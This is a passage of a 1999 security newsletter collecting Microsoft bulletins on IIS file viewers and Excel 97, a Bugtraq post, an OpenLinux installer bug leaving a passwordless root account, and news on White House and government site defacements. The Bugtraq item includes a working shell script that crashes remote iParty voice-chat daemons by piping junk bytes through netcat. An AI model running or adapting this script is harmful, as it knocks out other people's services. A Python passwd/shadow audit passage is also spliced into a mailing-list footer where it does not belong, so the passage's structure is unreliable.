The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.
X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html
as well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force of Internet
Security Systems, Inc.

@HWA

16.0 Microsoft Security Bulletin: File viewers vulnerability (MS99-13)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a Security Bulletin from the Microsoft Product Security
Notification Service.

Please do not reply to this message, as it was sent from an unattended
mailbox.

********************************

Microsoft Security Bulletin (MS99-013)
--------------------------------------

Solution Available for File Viewers Vulnerability

Originally Posted: May 7, 1999

Summary
=======

Microsoft has identified a vulnerability that occurs in some file
viewers that ship as part of Microsoft (r) Internet Information Server
and Site Server. The vulnerability could allow a web site visitor to
view, but not to change, files on the server, provided that they knew or
guessed the name of each file and had access rights to it based on
Windows NT ACLs. Microsoft is releasing this security bulletin to inform
customers of the vulnerability and enable them to eliminate it
immediately. Patches are being developed for the affected file viewers,
and will be available shortly. When they are available, an update to
this security bulletin will be released.

Issue
=====

Microsoft Site Server and Internet Information Server include tools that
allow web site visitors to view selected files on the server. These are
installed by default under Site Server, but must be explicitly installed
under IIS.
These tools are provided to allow users to view the source code of sample
files as a learning exercise, and are not intended to be deployed on
production web servers. The underlying problem in this vulnerability is
that the tools do not restrict which files a web site visitor can view.

It is important to note several important points:

 - These file viewers are not installed by default under IIS. They are
   only installed under IIS if the user chooses to install the sample
   web files.
 - This vulnerability only allows a web site visitor to view files. There
   is no capability through this vulnerability to change files or add
   files to the server.
 - This vulnerability does not in any way bypass the Windows NT file
   permission ACLs. A web site visitor could only use these tools to
   view files whose ACLs allow them read access. The administrator of
   the web server determines the specific permissions for all files on
   the server.
 - The viewers can only be used to view files on the same disk partition
   as the currently-displayed web page. Databases such as those used by
   e-commerce servers are typically stored on a different physical
   drive, and these would not be at risk.
 - The web site visitor would need to know or guess the name of each
   file they wished to view.

Specific steps that customers can take to immediately eliminate the
vulnerability are discussed below in What Customers Should Do. In
addition, Microsoft is developing updated versions of the file viewers
and will release them shortly. While there are no reports of customers
being adversely affected by this vulnerability, Microsoft is proactively
releasing this bulletin to allow customers to take appropriate action to
protect themselves against it.
Affected Software Versions
==========================

 - Microsoft Site Server 3.0, which is included with Microsoft Site
   Server 3.0 Commerce Edition, Microsoft Commercial Internet System
   2.0, and Microsoft BackOffice Server 4.0 and 4.5
 - Microsoft Internet Information Server 4.0

What Microsoft is Doing
=======================

Microsoft has provided this bulletin to inform customers of specific
steps that they can take to immediately eliminate this vulnerability on
their servers. Microsoft is developing updated file viewers that fix the
problem identified, and will release an updated version of this bulletin
when they are available.

Microsoft also has sent this security bulletin to customers subscribing
to the Microsoft Product Security Notification Service. See
http://www.microsoft.com/security/services/bulletin.asp for more
information about this free customer service.

Microsoft has published the following Knowledge Base (KB) article on
this issue:

 - Microsoft Knowledge Base (KB) article Q231368, Solution Available for
   File Viewers Vulnerability,
   http://support.microsoft.com/support/kb/articles/q231/3/68.asp.
   (Note: It might take 24 hours from the original posting of this
   bulletin for the KB article to be visible in the Web-based Knowledge
   Base.)

What Customers Should Do
========================

Customers should take the following steps to eliminate the vulnerability
on their web servers:

 - Unless the affected file viewers are specifically required on the web
   site, they should be removed. The following file viewers are
   affected: ViewCode.asp, ShowCode.asp, CodeBrws.asp and Winmsdp.exe.
   Depending on the specific installation, not all of these files may be
   present on a server. Likewise, there may be multiple copies of some
   files, so customers should do a full search of their servers to
   locate all copies.
 - In accordance with standard security guidelines, file permissions
   should always be set to enable web visitors to access only the files
   they need, and no others.
   Moreover, files that are needed by web visitors should provide the
   least privilege needed; for example, files that web visitors need to
   be able to read but not write should be set to read-only.
 - As a general rule, sample files and vroots should always be deleted
   from a web server prior to putting it into production. If they are
   needed, file access permissions should be used to regulate access to
   them as appropriate.

More Information
================

Please see the following references for more information related to
this issue.

 - Microsoft Security Bulletin MS99-013, Solution Available for File
   Viewers Vulnerability (The Web-posted version of this bulletin),
   http://www.microsoft.com/security/bulletins/ms99-013.asp.
 - Microsoft Knowledge Base (KB) article Q231368, Solution Available for
   File Viewers Vulnerability,
   http://support.microsoft.com/support/kb/articles/q231/3/68.asp.

Obtaining Support on this Issue
===============================

If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.

Acknowledgments
===============

Microsoft acknowledges WebTrends (www.webtrends.com) for discovering
this vulnerability and reporting it to us.

Revisions
=========

 - May 07, 1999: Bulletin Created.

For additional security-related information about Microsoft products,
please visit http://www.microsoft.com/security

--------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS
IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES,
EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE.
IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR
ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,
CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF
MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.

(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.

*******************************************************************

You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the
request, and can be anything you like.

For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.

@HWA

17.0 iParty pooper
~~~~~~~~~~~~~

Approved-By: aleph1@UNDERGROUND.ORG
Received: from hotmail.com (law2-f15.hotmail.com [216.32.181.15]) by
          netspace.org (8.8.7/8.8.7) with SMTP id NAA20477 for ;
          Sat, 8 May 1999 13:10:37 -0400
Received: (qmail 46545 invoked by uid 0); 8 May 1999 17:11:35 -0000
Received: from 142.169.181.31 by www.hotmail.com with HTTP;
          Sat, 08 May 1999 10:11:34 PDT
X-Originating-IP: [142.169.181.31]
Mime-Version: 1.0
Content-Type: multipart/mixed;
              boundary="----=_NextPart_000_e6987ad_6338d761$45c2e550"
Message-ID: <19990508171135.46544.qmail@hotmail.com>
Date: Sat, 8 May 1999 13:11:34 EDT
Reply-To: wh00t X
Sender: Bugtraq List
From: wh00t X
Subject: iParty Daemon Vulnerability w/ Exploit Code (worse than thought?)
X-cc: jaldrich@bumpkinland.com, packetstorm@genocide2600.com
To: BUGTRAQ@netspace.org
Content-type: text/plain; format=flowed;

Hi,

iParty, by Intel Experimental Technologies Department, (unofficial
information source at http://www.bumpkinland.com/iparty/), is a small
voice conferencing program, which includes a server daemon in the
download. It is handy for quick internet voice chat, but the server can
be killed by sending a large amount of extended characters to the server
port, which is 6004 by default, without being logged. The daemon either
crashes quietly or GPF (varies from box to box).

I've been told an advisory of some sort has already been released for
this particular vulnerability but I believe the matter needs further
attention because:

1. While there are other newer and better voice conferencing programs
   out, iParty continues to be widely used.

2. This vulnerability may be worse than thought: I tested my program
   (attached to message) against 4 random Windows 95/98 boxes with the
   daemon running, and after 2 or 3 crashes in a row, on top of crashing
   the iParty daemon, some experienced disconnection from the internet,
   ICQ and/or Rnaapp.exe, and one was even forced to reboot after the
   Rnaapp.exe crash.

Thanks,
Ka-wh00t

_______________________________________________________________
Get Free Email and Do More On The Web. Visit http://www.msn.com

Content-Type: text/plain; name="ippooper.sh"
Content-Disposition: attachment; filename="ippooper.sh"
X-MIME-Autoconverted: from 8bit to quoted-printable by smv18.iname.net id SAA23880

ippooper.sh

#!/bin/sh
# iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom.
# iParty is a cute little voice conferencing program still widely used (much to my surprise.)
# Unfortunately, the daemon, that's included in the iParty download, can be shut down remotely.
# And in some circumstances, this can lead to other Windows screw-ups (incidents included internet
# disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times
# a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest
# (only?) version of iParty/iPartyd was v1.2
# FOR EDUCATIONAL PURPOSES ONLY.

if [ "$1" = "" ]; then
  echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)"
  echo "In some circumstances can also crash other Windows progs and maybe even Windows itself."
  echo "Maybe you'll get lucky."
  echo ""
  echo "Usage: $0 "
  echo "Port is probably 6004 (default port)."
  echo ""
  echo "Remember: You need netcat for this program to work."
  echo "If you see something similar to 'nc: command not found', get netcat."
else
  if [ "$2" = "" ]; then
    echo "I said the port is probably 6004, try that."
    exit
  else
    rm -f ipp00p
    cat > ipp00p << _EOF_
$6ì]}tTÕµ?"Ìaœp/˜HÔD†0iAá½L%ÏÌ‚EBEÔð'*}ÒyÓÔ¥(3êz‹nÃuèÔj+¨°(Ö—Ö„d'‰™øZiXåËy7 ¡'``à¾½Ï Cµ¶ïüÖʹçî³ÏÞçì½Ï>çÜE¢6‡â^ßî^v¯?ì^¯:ÂÆ{n"uí£Ç'g=o¨§ „8ÂÓ'L5"ïé²±žá¤¸DRGÒIôlq„Y­g›»ÒiƒÆiÕ¾ëH¹H„w‹òá½²»Ô3ðlŽš*oÎ#ésC9m,
_EOF_
    echo ""
    echo "Sending kill..."
    cat ipp00p | nc $1 $2
    echo "Done."
    rm -f ipp00p
  fi
fi

@HWA

18.0 Microsoft Security Advisory Bulletin: Excel 97 virus patch (MS99-14)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a Security Bulletin from the Microsoft Product Security
Notification Service.

Please do not reply to this message, as it was sent from an unattended
mailbox.

********************************

Microsoft Security Bulletin (MS99-014)
--------------------------------------

Patch Available for Excel 97 Virus Warning Vulnerabilities

Originally Posted: May 7, 1999

Summary
=======

Microsoft has released a patch that eliminates vulnerabilities in the
Excel 97 virus warning mechanism.
The patch is fully supported, and Microsoft recommends that affected
customers download and install it, if appropriate.

Issue
=====

Microsoft Excel 97 provides a feature that warns the user before
launching an external file that could potentially contain a virus or
other malicious software. This feature allows the user to weigh the risk
of opening the file, based on its origin, the network it is located on
and the security practices in operation there, the sensitivity of the
data on the user's computer, and other factors. However, certain
scenarios have been identified that could be misused to bypass the
warning mechanism. In general, they require the use of
infrequently-combined features and commands, and are unlikely to be
encountered in normal use. This patch addresses these issues so that
they cannot be taken advantage of by a malicious user.

While there are no reports of customers being adversely affected by any
of the vulnerabilities eliminated by the patch, Microsoft is proactively
releasing the patch to allow customers to take appropriate action to
protect themselves against it. These fixes are already built into Excel
2000 and users of that product will not need to download this patch.

Affected Software Versions
==========================

 - Microsoft Excel 97

What Microsoft is Doing
=======================

Microsoft has released patches that fix the problem identified. The
patches are available for download from the sites listed below in What
Customers Should Do.

Microsoft also has sent this security bulletin to customers subscribing
to the Microsoft Product Security Notification Service. See
http://www.microsoft.com/security/services/bulletin.asp for more
information about this free customer service.

Microsoft has published the following Knowledge Base (KB) article on
this issue:

 - Microsoft Knowledge Base (KB) article Q231304, Patch Available for
   Excel 97 Virus Warning Vulnerabilities,
   http://support.microsoft.com/support/kb/articles/q231/3/04.asp.
   (Note: It might take 24 hours from the original posting of this
   bulletin for the KB article to be visible in the Web-based Knowledge
   Base.)

What Customers Should Do
========================

Microsoft highly recommends that customers evaluate the degree of risk
that this vulnerability poses to their systems and determine whether to
download and install the patch. The patch can be found at:

 - http://officeupdate.microsoft.com/downloaddetails/xl8p6pkg.htm

More Information
================

Please see the following references for more information related to
this issue.

 - Microsoft Security Bulletin MS99-013, Patch Available for Excel 97
   Virus Warning Vulnerabilities (the Web-posted version of this
   bulletin), http://www.microsoft.com/security/bulletins/ms99-013.asp.
 - Microsoft Knowledge Base (KB) article Q231304, Patch Available for
   Excel 97 Virus Warning Vulnerabilities,
   http://support.microsoft.com/support/kb/articles/q231/3/04.asp.

Obtaining Support on this Issue
===============================

If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.

Revisions
=========

 - May 7, 1999: Bulletin Created.

For additional security-related information about Microsoft products,
please visit http://www.microsoft.com/security

--------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS
IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES,
EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE.
IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR
ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,
CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF
MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.

(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.

*******************************************************************

You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the
request, and can be anything you like.

For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.

@HWA

19.0 LISA install leaves root access: Openlinux 2.2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

X-From_: linux-security-request@redhat.com Sun May 9 05:45:16 1999
Date: Sat, 8 May 1999 23:46:40 -0400 (EDT)
From: Andrew McRory
X-Sender: amacc@ns1.mailer.org
To: linux-security@redhat.com
cc: bugtraq@netspace.org
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
Subject: [linux-security] OpenLinux 2.2: LISA install leaves root access without password

Hello,

I believe I've found a bug in the installation process of OpenLinux 2.2
when using the LISA boot disk. During the installation a temporary
passwd file is put on the new file system containing the user "help" set
uid=0 gid=0 and no password.
Once you are prompted to set the root password and default user password
a new passwd and shadow file is created yet the help user is left in the
shadow file with, you guessed it, no password...

Here are the offending entries:

/etc/passwd
help:x:0:0:install help user:/:/bin/bash

/etc/shadow
help::10709:0:365:7:7::

Anyone who installed OpenLinux 2.2 using the LISA boot disk should check
their password file now ;-)

I found this using a cdrom I made from a mirror of the mirror at
ftp.tux.org. Just to make sure I wasn't mixed up I redownloaded the
install.144 file from ftp.calderasystems.com and tried again. Same thing.
The install disk is version 137 dated 26Mar99 (displayed on the boot
message).

I wrote Caldera a message late in the day Friday regarding this bug but
haven't heard back from anyone. I've tried to resist posting this until I
hear back but I really feel people should know now!!

PS: I'm not sure if Lizard, the graphical installation method, has this
problem. It crashes before it does much here.... that's why I tried LISA.

Thanks,

Andrew McRory - amacc@linuxsys.com
***********************************
Linux Systems Engineers / The PC Doctors *
3009-C West Tharpe Street - Tallahassee, FL 32303 * Voice 850.575.7213
***************************************************

--
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
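A check for exactly the leftover described in the post above, added here as an example (it is not part of Andrew McRory's post): it parses passwd and shadow and flags any uid 0 account other than root and any account whose password field is empty. The file contents are constructed from the two entries quoted in the post plus ordinary filler accounts with made-up hashes.

```python
# Added example, not from the post: audit passwd/shadow for what the LISA
# installer left behind. The file contents below are constructed; the two
# 'help' entries are the ones quoted in the post, the rest is filler with
# placeholder (not real) hashes.
PASSWD_TEXT = """\
root:x:0:0:root:/root:/bin/bash
help:x:0:0:install help user:/:/bin/bash
daemon:x:1:1:daemon:/sbin:/bin/false
col:x:500:100:Col User:/home/col:/bin/bash
"""

SHADOW_TEXT = """\
root:$1$constructed$notarealhashxxxxxxxxxx:10709:0:99999:7:::
help::10709:0:365:7:7::
daemon:*:10709:0:99999:7:::
col:$1$constructed$notarealhashyyyyyyyyyy:10709:0:99999:7:::
"""


def parse_passwd(text: str) -> dict:
    """name -> {uid, gid, shell, pw} for every well-formed 7-field line."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line: skip it rather than guess
        name, pw, uid, gid, _gecos, _home, shell = fields
        users[name] = {"uid": int(uid), "gid": int(gid), "shell": shell, "pw": pw}
    return users


def parse_shadow(text: str) -> dict:
    """name -> hashed password field (the second field of each line)."""
    hashes = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    return hashes


def audit(passwd_text: str, shadow_text: str) -> list:
    """Return one finding string per problem, in passwd order."""
    findings = []
    shadow = parse_shadow(shadow_text)
    for name, u in parse_passwd(passwd_text).items():
        if u["uid"] == 0 and name != "root":
            findings.append(f"{name}: uid 0 account other than root")
        # 'x' in passwd means the real field lives in shadow; anything else
        # is the password field itself (legacy unshadowed layout).
        if u["pw"] == "x":
            if name not in shadow:
                findings.append(f"{name}: passwd says shadowed but no shadow entry")
                continue
            secret = shadow[name]
        else:
            secret = u["pw"]
        if secret == "":
            findings.append(f"{name}: empty password field, login needs no password")
    return findings


if __name__ == "__main__":
    for finding in audit(PASSWD_TEXT, SHADOW_TEXT):
        print(finding)
```

Run against real files (cat /etc/passwd and /etc/shadow as root) the same audit() reports the 'help' account twice: once for uid 0 and once for the empty shadow field.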
----------------------------------------------------------------------
To unsubscribe: mail -s unsubscribe linux-security-request@redhat.com < /dev/null

@HWA

20.0 BUGTRAQ receives a plaque at SANS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 08:46:48 -0700
Reply-To: Aleph One
Sender: Bugtraq List
From: Aleph One
Subject: Administrivia
To: BUGTRAQ@netspace.org

The SANS Institute (http://www.sans.org/) has graciously given Bugtraq a
plaque during the SANS conference now happening at Baltimore for being
one of the three most valuable security publications. This is in response
to a survey they did at an earlier conference. I'd like to thank SANS for
the gesture. Although I accepted the plaque it is really for all of you.

Cheers.

--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 12:52:22 -0400
Reply-To: Brian Fisk
Sender: Bugtraq List
From: Brian Fisk
Subject: Re: Administrivia
To: BUGTRAQ@netspace.org
In-Reply-To: <19990510084648.C29946@underground.org>

I would also like to thank the SANS Institute on behalf of NetSpace, as
they also donated a sizable chunk of money for a mail server upgrade as
part of the same award. This donation, combined with other donations from
the Bugtraq community in the past allowed us to double (or potentially
even more) our mail delivery capacity for this list as well as all the
others that NetSpace serves.

Thanks to everyone here who makes this list what it is.

Brian Fisk
NetSpace Administrator

On Mon, 10 May 1999, Aleph One wrote:

> The SANS Institute (http://www.sans.org/) has graciously given Bugtraq
> a plaque during the SANS conference now happening at Baltimore for being
> one of the three most valuable security publications. This is in response
> to a survey they did at an earlier conference. I'd like to thank SANS
> for the gesture.
> Although I accepted the plaque it is really for all of
> you.
>
> Cheers.
>
> --
> Aleph One / aleph1@underground.org
> http://underground.org/
> KeyID 1024/948FD6B5
> Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
>

--
Brian Fisk
bfisk@netspace.org

@HWA

21.0 White House takes server offline
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

White House Takes Server Offline

contributed by Weld Pond

In order to conduct an "Administrative Review" the White House took its
web server offline and also closed off all e-mail to and from the
outside world. This comes after what HNN believes to be a successful
crack of the www1. server at 8:50am EST Monday morning. This crack was
_not_ related to other recent .gov/.mil cracks nor was this crack
strongly related to the Chinese embassy bombing or had any other
political motives. Other mainstream news outlets are getting their
stories confused. (If you only read one of these articles I recommend
the one by Brock Meeks of MSNBC, it seems to be the most thorough.)

HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html

MSNBC
http://www.msnbc.com/news/268339.asp

Heise.de
http://www.heise.de/newsticker/data/fr-11.05.99-000/

ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/whhack990511.html

C|Net
http://www.news.com/News/Item/0,4,36431,00.html?st.ne.fd.mdh.ni

CNN
http://www.cnn.com/TECH/computing/9905/12/white.house.site.01/index.html

Nando Times
http://www.techserver.com/story/body/0,1634,47750-77011-550124-0,00.html

MSNBC

White House Web site shut down
Purported attacker says there was no political motive

By Brock N. Meeks and Alan Boyle
MSNBC

WASHINGTON, May 11 - The White House shut down its public Web site for
more than 24 hours because of computer attacks, a spokesman said Tuesday.
Government Web sites have sustained a wave of assaults apparently aimed
at protesting last week’s NATO bombing of the Chinese Embassy in
Belgrade.
However, in an interview with MSNBC, a computer user who claimed a role
in the White House Web break-in denied that there was a political
motive.

"AN ATTEMPT was made to break into the system that operates the Web page
yesterday morning," White House spokesman Barry Toiv told MSNBC Tuesday,
"and so what we’ve done is use existing procedures to limit access to
the system so we could make a full assessment." The Web site was back in
operation by Wednesday morning.

Computer attacks on government Web sites have taken on a higher profile
in the wake of Friday’s embassy bombing, which left three dead and 20
injured. The bombing, which NATO said was due to an intelligence error,
sparked a wave of demonstrations at the U.S. Embassy in Beijing, as well
as widespread criticism online and offline. A variety of federal sites
have been defaced by political protesters.

But the primary motivation behind the attack on the White House site was
merely to show that it could be done, a teen-ager who said he was
involved in the attack told MSNBC.

A telephone conversation with the 18-year-old was arranged by a mutually
trusted intermediary. The teen, who claimed to be a member of the group
known as gH or Global Hell, spoke on the condition that neither his real
name nor his hacker nickname would be published. To back up his claim,
he provided internal user logs listing White House staff. His account
also was consistent with other reports provided by trusted third
parties.

‘JUST LUCK’

The teen said the White House Web break-in was actually "just luck."

"Members of gH caught the White House system administrator transferring
log files in an insecure manner via an unsecured FTP site that was
snooped out from another box (computer)," he told MSNBC. "I have no idea
why they would do that. Whoever that admin was, he didn’t know what he
was doing," he said.

Along with gH, a group calling itself the Hong Kong Danger Duo took part
in the White House hack, the teen said.
He said the White House hack lasted for only a few minutes, due to what
is known as a crontab, a timed command set by the system administrator.
This command automatically refreshes the entire site with identical
content from a secure server to help guard against the kind of attack
that took place Monday.

OTHER DEPARTMENTS HIT

Government sources told NBC News that attackers also hit the Web servers
for the departments of Energy, Interior and Labor, as well as the U.S.
Information Agency’s Web site. All those Web sites were in service
Tuesday afternoon, although traffic to the Energy Department’s Web site
was redirected to a numerical Internet address.

The sources said the intruders left behind cyber-graffiti slogans
saying, for example, "You bombed the Chinese Embassy, this is what
you’re going to get." Some of the graffiti was in Chinese characters,
the sources said.

In all cases, the Web computer servers contained only publicly available
information, and no classified information was compromised, officials
emphasized.

The politically motivated attacks on departmental Web sites appear to be
unrelated to the White House attacks. The teen from gH said he had no
idea who carried out the other computer attacks, an assertion that
meshed with other reports.

Several hacker-oriented sites including AntiOnline as well as Hacker
News Network and Attrition.Org posted what they said were copies of the
White House hack. A message hidden inside the source code for the page
reads: "You found my elite hidden source. Wow. Ok, no real msg here.
Stop all the war, no point for it. This box wasn’t ever secure."

Brian Martin, who runs the Attrition.Org site, said the "stop all the
war" reference doesn’t mean the attack was launched with politics in
mind. "A lot of hackers will do that to kind of justify what they are
doing," Martin said. "They hacked this site because they could," he
said. "They saw a window of opportunity and took it."
The White House site is operated under contract by PSINet of Herndon, Va.

NBC News correspondent Jim Miklaszewski and MSNBC's Bob Sullivan contributed to this report.

@HWA

22.0 Feds to install IDS
~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Feds Look to Install IDS
contributed by erewhon

The GSA, the Critical Infrastructure Assurance Office, the National Security Agency and the FBI's National Infrastructure Protection Center (jeeez, think they have enough people working on this?) are working on a Federal Intrusion Detection Network (FIDNET) which will provide a common center for response to cyber attacks on agencies.

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0510/web-fidnet-5-11-99.html

MAY 11, 1999 . . . 18:10 EDT

Agencies lay groundwork for intrusion-detection network

BY DIANE FRANK (dfrank@fcw.com)

A group of federal agencies has completed the initial model of a governmentwide intrusion-detection network that will provide a common center for response to cyberattacks on agencies.

The Federal Intrusion Detection Network (FIDNET) is in the very early stages of development, and the group of federal agencies heading the development effort recently agreed on possible agency responsibilities and a reporting structure, said Tom Burke, assistant commissioner of information security at the General Services Administration's Federal Technology Service, today at the Outlook 2000 conference in Falls Church, Va.

GSA, the Critical Infrastructure Assurance Office, the National Security Agency and the FBI's National Infrastructure Protection Center are all developing FIDNET as part of President Clinton's directive to protect the nation's mission-critical systems.

The system is intended to provide all agencies with intrusion-detection systems that will allow agencies to locate incidents across the government as soon as they occur. It also will serve as a center for analysis of intrusions or attacks.
The system will be made of three main blocks, with the civilian agencies reporting to the Defense and intelligence agencies and possibly a full-time program management office overseeing the whole system.

FIDNET is based on the Defense Department's incident-reporting network, which is much further along than the efforts in the civilian agencies. "We're looking to leverage the work that has already been done at Air Force and DOD so we don't duplicate their effort," Burke said.

The blocks eventually will include a similar network being developed in the private sector and the Federal Computer Incident Response Capability center at GSA, Burke said.

@HWA

23.0 CIH Damages climb in China
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

360,000 Systems Damaged in China
Contributed by DongWong

A survey released earlier this month indicates that at least 360,000 systems were damaged by the CIH or Chernobyl virus. The damage was estimated at Rmb1 million (US$120 million). The survey was conducted by Beijing Rising Computer Science and Technology Development Co., Ltd., a Chinese anti-virus company.

Asia BizTech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/57681

24.0 Company claims damages in web page defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Company Claims Damages From Attack
contributed by War3z Dud3

An Issaquah, Washington high-tech company is claiming thousands of dollars worth of damage after it had its web page defaced. The defaced page was a protest of NATO's bombing of the Chinese Embassy in Belgrade. The FBI is investigating and has claimed to have tracked the attackers to three locations: one in New York, one in Massachusetts, and another in St. Louis.
Yahoo Daily News
http://dailynews.yahoo.com/headlines/local/state/washington/story.html?s=v/rs/19990510/wa/index_2.html#2

Internet Company Hit By Hackers - (ISSAQUAH) -- An Issaquah high-tech company is dealing with thousands of dollars in damage, thanks to the Chinese embassy bombing in Belgrade. Michael Renz at webcityusa-dot-com went online last night to update his websites for a dozen local businesses. That's when he realized someone had destroyed them. In their place, the hackers had placed graphic pictures of embassy bombing victims and hate messages blasting the U-S and NATO. Authorities, including the FBI, are investigating and have reportedly traced the action to three different university websites: one in New York, one in Massachusetts, and another in St. Louis.

@HWA

25.0 Three .gov sites hacked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Three Gov Servers Cracked in Protest of Embassy Bombing
contributed by Space Rogue

The Department of Energy, The Department of the Interior, and the National Park Service all had their web sites defaced in protest of the NATO bombing of the Chinese Embassy in Yugoslavia. The defaced pages included pictures of the people killed in the bombing.

ABC News
http://abcnews.go.com/sections/world/DailyNews/kosovo_chinacyber_990509.html

Australian Broadcasting Corporation
http://www.abc.net.au/news/newslink/weekly/newsnat-11may1999-2.htm

C|Net
http://www.news.com/News/Item/0,4,36311,00.html?owv

CNN
http://www.cnn.com/TECH/computing/9905/10/hack.attack.02/index.html

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0510/web-nato-5-10-99.html

ITN
http://www.itn.co.uk/World/world19990510/051005w.htm

Federal Computer Week; MAY 10, 1999 . . . 14:25 EDT

Hackers retaliate after NATO bombing

BY BRAD BASS (brad_bass@fcw.com)

A group of Chinese hackers defaced the home pages of the departments of Energy and Interior this past weekend, apparently in retaliation for NATO's accidental bombing of the Chinese embassy in Belgrade.

The hackers claimed their motives were not political but were a response to the death of Chinese journalists resulting from NATO's attack. The messages were written in Chinese and English. The hackers referred to the bombing as a "Nazi action" and urged NATO, and specifically the United States, to accept responsibility. "You have owed [sic] Chinese people a bloody debt which you must pay for," said a message on the DOE Web site on Sunday afternoon. "We won't stop attacking until the war stops!"

A spokesman for iDefense, an information clearinghouse on critical infrastructure protection, said the attack probably did little harm but characterized it as "a warning sign" to the government. "It's just another sign that these types of things are easy to accomplish if you have a modem and a little technical knowledge," the spokesman said. "It's not too far removed from taking it to another more harmful level."

-=-

C|Net;

Chinese attack embassy bombing on Net
By Reuters
Special to CNET News.com
